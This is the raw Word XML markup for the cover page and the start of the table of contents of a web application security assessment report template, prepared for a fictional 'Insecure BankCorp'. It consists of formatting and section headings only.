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horzAnchor="margin" w:tblpYSpec="bottom"/>
        <w:tblW w:w="3000" w:type="pct"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="5184"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C079B2" w14:paraId="486E83FC" w14:textId="77777777" w:rsidTr="00C079B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5314" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17C70098" w14:textId="77777777" w:rsidR="00C079B2" w:rsidRDefault="00C079B2" w:rsidP="00C079B2">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="365F91"/>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
              <w:t xml:space="preserve">Web Application Security Assessment Report </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C079B2" w14:paraId="34119713" w14:textId="77777777" w:rsidTr="00C079B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5314" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52CA404C" w14:textId="77777777" w:rsidR="00C079B2" w:rsidRPr="00C079B2" w:rsidRDefault="00C079B2">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:rPr>
                <w:color w:val="484329"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C079B2" w14:paraId="3642AC31" w14:textId="77777777" w:rsidTr="00C079B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5314" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21DD8A39" w14:textId="3B01B61B" w:rsidR="00C079B2" w:rsidRPr="0086611E" w:rsidRDefault="00415780">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0086611E">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">Prepared for </w:t>
            </w:r>
            <w:r w:rsidR="00FA7B2E" w:rsidRPr="0086611E">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Insecure BankCorp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B0C69C6" w14:textId="36AC5522" w:rsidR="00C079B2" w:rsidRPr="0092554E" w:rsidRDefault="00415780">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0086611E">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">By </w:t>
            </w:r>
            <w:r w:rsidR="00FA7B2E" w:rsidRPr="0086611E">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Christopher Acuna</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C079B2" w14:paraId="3AF4D8EA" w14:textId="77777777" w:rsidTr="00C079B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5314" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36D4B6C8" w14:textId="77777777" w:rsidR="00C079B2" w:rsidRPr="0092554E" w:rsidRDefault="00C079B2">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1974EE7A" w14:textId="77777777" w:rsidR="00C079B2" w:rsidRPr="0092554E" w:rsidRDefault="00C079B2">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="35ED6D4D" w14:textId="77777777" w:rsidR="00C079B2" w:rsidRPr="0092554E" w:rsidRDefault="00C079B2">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7086F88A" w14:textId="77777777" w:rsidR="00C079B2" w:rsidRPr="0092554E" w:rsidRDefault="00C079B2">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="04F9B09C" w14:textId="77777777" w:rsidR="00C079B2" w:rsidRPr="0092554E" w:rsidRDefault="00C079B2">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="79F9087E" w14:textId="77777777" w:rsidR="00C079B2" w:rsidRPr="0092554E" w:rsidRDefault="00C079B2">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="61C7AFF9" w14:textId="77777777" w:rsidR="00C079B2" w:rsidRPr="0092554E" w:rsidRDefault="00C079B2">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="44B6DA5E" w14:textId="77777777" w:rsidR="00C079B2" w:rsidRPr="0092554E" w:rsidRDefault="00C079B2">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="35E42C1B" w14:textId="77777777" w:rsidR="00C079B2" w:rsidRPr="0092554E" w:rsidRDefault="00C079B2">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0D7CC720" w14:textId="77777777" w:rsidR="00C079B2" w:rsidRPr="0092554E" w:rsidRDefault="00C079B2">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="06EFDCC3" w14:textId="77777777" w:rsidR="00C079B2" w:rsidRPr="0092554E" w:rsidRDefault="00C079B2">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C079B2" w14:paraId="4F688099" w14:textId="77777777" w:rsidTr="00C079B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5314" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E326C10" w14:textId="77777777" w:rsidR="00C079B2" w:rsidRPr="00C079B2" w:rsidRDefault="00C079B2">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C079B2" w14:paraId="44E83AC7" w14:textId="77777777" w:rsidTr="00C079B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5314" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="771A3ECD" w14:textId="77777777" w:rsidR="00C079B2" w:rsidRPr="00C079B2" w:rsidRDefault="00C079B2" w:rsidP="00C079B2">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C079B2" w14:paraId="243BD944" w14:textId="77777777" w:rsidTr="00C079B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5314" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C23CB52" w14:textId="499F7534" w:rsidR="00C079B2" w:rsidRPr="00C079B2" w:rsidRDefault="00FA7B2E" w:rsidP="0087036B">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>February 25, 2022</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C079B2" w14:paraId="61E7A5F3" w14:textId="77777777" w:rsidTr="00C079B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5314" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="270ABC54" w14:textId="77777777" w:rsidR="00C079B2" w:rsidRPr="00C079B2" w:rsidRDefault="00C079B2">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0ED64767" w14:textId="77777777" w:rsidR="00C079B2" w:rsidRDefault="00C079B2"/>
    <w:p w14:paraId="4D7DF204" w14:textId="2BC24D9A" w:rsidR="00C079B2" w:rsidRDefault="00AD1A16">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251656704" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="38913524" wp14:editId="7E0BF4FB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:align>right</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:align>bottom</wp:align>
                </wp:positionV>
                <wp:extent cx="1847850" cy="4824095"/>
                <wp:effectExtent l="3810" t="9525" r="5715" b="5080"/>
                <wp:wrapNone/>
                <wp:docPr id="1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850" cy="4824095"/>
                          <a:chOff x="5531" y="1258"/>
                          <a:chExt cx="5291" cy="13813"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="20" name="AutoShape 47"/>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1" name="Group 48"/>
                        <wpg:cNvGrpSpPr>
                          <a:grpSpLocks/>
                        </wpg:cNvGrpSpPr>
                        <wpg:grpSpPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="5531" y="9226"/>
                            <a:ext cx="5291" cy="5845"/>
                            <a:chOff x="5531" y="9226"/>
                            <a:chExt cx="5291" cy="5845"/>
                          </a:xfrm>
                        </wpg:grpSpPr>
                        <wps:wsp>
                          <wps:cNvPr id="22" name="Freeform 49"/>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50"/>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24" name="Oval 51"/>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7BBE9D5" id="Group 46" o:spid="_x0000_s1026" style="position:absolute;margin-left:94.3pt;margin-top:0;width:145.5pt;height:379.85pt;z-index:25165670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">
                <v:shapetype id="_x0000_t32" coordsize="21600,21600" o:spt="32" o:oned="t" path="m,l21600,21600e" filled="f">
                  <v:path arrowok="t" fillok="f" o:connecttype="none"/>
                  <o:lock v:ext="edit" shapetype="t"/>
                </v:shapetype>
                <v:shape id="AutoShape 47" o:spid="_x0000_s1027"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" strokecolor="#a7bfde"/>
                <v:group id="Group 48"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49"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" path="m6418,1185r,5485l1809,6669c974,5889,,3958,1407,1987,2830,,5591,411,6418,1185xe" fillcolor="#a7bfde" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="5291,1038;5291,5845;1491,5844;1160,1741;5291,1038" o:connectangles="0,0,0,0,0"/>
                  </v:shape>
                  <v:oval id="Oval 50" o:spid="_x0000_s1030"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" fillcolor="#d3dfee" stroked="f" strokecolor="#a7bfde"/>
                  <v:oval id="Oval 51" o:spid="_x0000_s1031" style="position:absolute;left:6217;top:10481;width:3424;height:3221;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" fillcolor="#7ba0cd" stroked="f" strokecolor="#a7bfde"/>
                </v:group>
                <w10:wrap anchorx="page" anchory="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658752" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="35B073EE" wp14:editId="1C036CD5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:align>left</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:align>top</wp:align>
                </wp:positionV>
                <wp:extent cx="3246120" cy="2660650"/>
                <wp:effectExtent l="9525" t="9525" r="1905" b="6350"/>
                <wp:wrapNone/>
                <wp:docPr id="1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2660650"/>
                          <a:chOff x="15" y="15"/>
                          <a:chExt cx="9296" cy="7619"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="14" name="AutoShape 58"/>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5" name="Group 59"/>
                        <wpg:cNvGrpSpPr>
                          <a:grpSpLocks/>
                        </wpg:cNvGrpSpPr>
                        <wpg:grpSpPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="7095" y="5418"/>
                            <a:ext cx="2216" cy="2216"/>
                            <a:chOff x="7907" y="4350"/>
                            <a:chExt cx="2216" cy="2216"/>
                          </a:xfrm>
                        </wpg:grpSpPr>
                        <wps:wsp>
                          <wps:cNvPr id="16" name="Oval 60"/>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61"/>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Oval 62"/>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AD8931" id="Group 57" o:spid="_x0000_s1026" style="position:absolute;margin-left:0;margin-top:0;width:255.6pt;height:209.5pt;z-index:25165875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" o:allowincell="f">
                <v:shape id="AutoShape 58"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" strokecolor="#a7bfde"/>
                <v:group id="Group 59" o:spid="_x0000_s102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60" o:spid="_x0000_s1029" style="position:absolute;left:7907;top:4350;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" fillcolor="#a7bfde" stroked="f"/>
                  <v:oval id="Oval 61" o:spid="_x0000_s1030" style="position:absolute;left:7961;top:4684;width:181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" fillcolor="#d3dfee" stroked="f"/>
                  <v:oval id="Oval 62" o:spid="_x0000_s1031" style="position:absolute;left:8006;top:5027;width:1375;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" fillcolor="#7ba0cd" stroked="f"/>
                </v:group>
                <w10:wrap anchorx="page" anchory="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251657728" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="4D5C40BC" wp14:editId="23E2437D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>right</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:align>top</wp:align>
                </wp:positionV>
                <wp:extent cx="2323465" cy="1586865"/>
                <wp:effectExtent l="8890" t="9525" r="1270" b="3810"/>
                <wp:wrapNone/>
                <wp:docPr id="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3465" cy="1586865"/>
                          <a:chOff x="4136" y="15"/>
                          <a:chExt cx="6654" cy="4545"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="6" name="AutoShape 53"/>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8" name="Oval 54"/>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55"/>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56"/>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64327E" id="Group 52" o:spid="_x0000_s1026" style="position:absolute;margin-left:131.75pt;margin-top:0;width:182.95pt;height:124.95pt;z-index:25165772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" o:allowincell="f">
                <v:shape id="AutoShape 53"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" strokecolor="#a7bfde"/>
                <v:oval id="Oval 54" o:spid="_x0000_s1028" style="position:absolute;left:6674;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" fillcolor="#a7bfde" stroked="f"/>
                <v:oval id="Oval 55" o:spid="_x0000_s1029" style="position:absolute;left:6773;top:1058;width:3367;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" fillcolor="#d3dfee" stroked="f"/>
                <v:oval id="Oval 56" o:spid="_x0000_s1030" style="position:absolute;left:6856;top:1709;width:25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" fillcolor="#7ba0cd" stroked="f"/>
                <w10:wrap anchorx="margin" anchory="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BA54BF" w14:textId="77777777" w:rsidR="00386D9D" w:rsidRDefault="00C079B2" w:rsidP="00E4742A">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5226A9" w14:textId="77777777" w:rsidR="002E4258" w:rsidRPr="00E12B41" w:rsidRDefault="002E4258" w:rsidP="00E12B41">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B323BE">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Table of Contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A2043A" w14:textId="77777777" w:rsidR="00F63A7E" w:rsidRPr="000D2342" w:rsidRDefault="002E4258">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8630"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:hyperlink w:anchor="_Toc46402700" w:history="1">
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Template Instructions:</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc46402700 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2288EEF4" w14:textId="77777777" w:rsidR="00F63A7E" w:rsidRPr="000D2342" w:rsidRDefault="009A5BBA">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="400"/>
          <w:tab w:val="right" w:leader="dot" w:pos="8630"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc46402701" w:history="1">
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="000D2342">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:noProof/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Assessment Introduction</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc46402701 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7A43BDDC"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02" w:history="1">
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>1.1</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="000D2342">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
            <w:smallCaps w:val="0"/>
            <w:noProof/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>References</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc46402702 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="13D79C1B" w14:textId="77777777" w:rsidR="00F63A7E" w:rsidRPr="000D2342" w:rsidRDefault="009A5BBA">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="400"/>
          <w:tab w:val="right" w:leader="dot" w:pos="8630"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc46402703" w:history="1">
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="000D2342">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:noProof/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Web Application Description</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc46402703 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="518C82F6"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04" w:history="1">
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>2.1</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="000D2342">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
            <w:smallCaps w:val="0"/>
            <w:noProof/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Application Overview</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc46402704 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
